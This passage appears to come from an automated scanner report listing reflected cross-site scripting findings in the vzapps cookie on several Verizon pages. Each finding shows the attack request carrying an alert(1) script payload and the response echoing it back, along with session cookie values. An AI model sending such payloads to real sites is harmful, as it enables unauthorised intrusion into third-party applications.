Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71665
Expires: Sat, 20 Nov 2010 00:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/
Set-Cookie: ContextInfo_Equipment=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4EB83'><SCRIPT>ALERT(1)</SCRIPT>D3FF6108A2C ' />
...[SNIP]...

3.144. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50560
Expires: Sat, 20 Nov 2010 00:09:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9A607'><SCRIPT>ALERT(1)</SCRIPT>D0CCB927D19 ' />
...[SNIP]...

3.145. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7ac79<script>alert(1)</script>c047a0243fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7ac79<script>alert(1)</script>c047a0243fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50556
Expires: Sat, 20 Nov 2010 00:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7ac79<script>alert(1)</script>c047a0243fc; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX7AC79<SCRIPT>ALERT(1)</SCRIPT>C047A0243FC </DIV>
...[SNIP]...

3.146. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65391
Expires: Sat, 20 Nov 2010 00:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX474E8'><SCRIPT>ALERT(1)</SCRIPT>6198F299341 ' />
...[SNIP]...

3.147. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84381
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX64704'><SCRIPT>ALERT(1)</SCRIPT>60E1CC3BB19 ' />
...[SNIP]...

3.148. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50751
Expires: Sat, 20 Nov 2010 00:16:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' />
...[SNIP]...

3.149. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Games/Games.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75296
Expires: Sat, 20 Nov 2010 00:16:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Games
</title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' />
...[SNIP]...

3.150. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/EntertainmentOnDemand/Movies/Movies.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70797
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Entertainment on Demand: Movies
</title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' />
...[SNIP]...

3.151. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 00:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX56c4c'><script>alert(1)</script>277bd852140; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX56C4C'><SCRIPT>ALERT(1)</SCRIPT>277BD852140 ' />
...[SNIP]...

3.152. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fc928<script>alert(1)</script>80e25040c4e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXfc928<script>alert(1)</script>80e25040c4e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117564
Expires: Sat, 20 Nov 2010 00:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXfc928<script>alert(1)</script>80e25040c4e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFC928<SCRIPT>ALERT(1)</SCRIPT>80E25040C4E </DIV>
...[SNIP]...

3.153. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69367
Expires: Sat, 20 Nov 2010 00:13:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=TXb8b99'><script>alert(1)</script>47fb54bb178; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB8B99'><SCRIPT>ALERT(1)</SCRIPT>47FB54BB178 ' />
...[SNIP]...

3.154. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab07d<script>alert(1)</script>4c69398d6d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
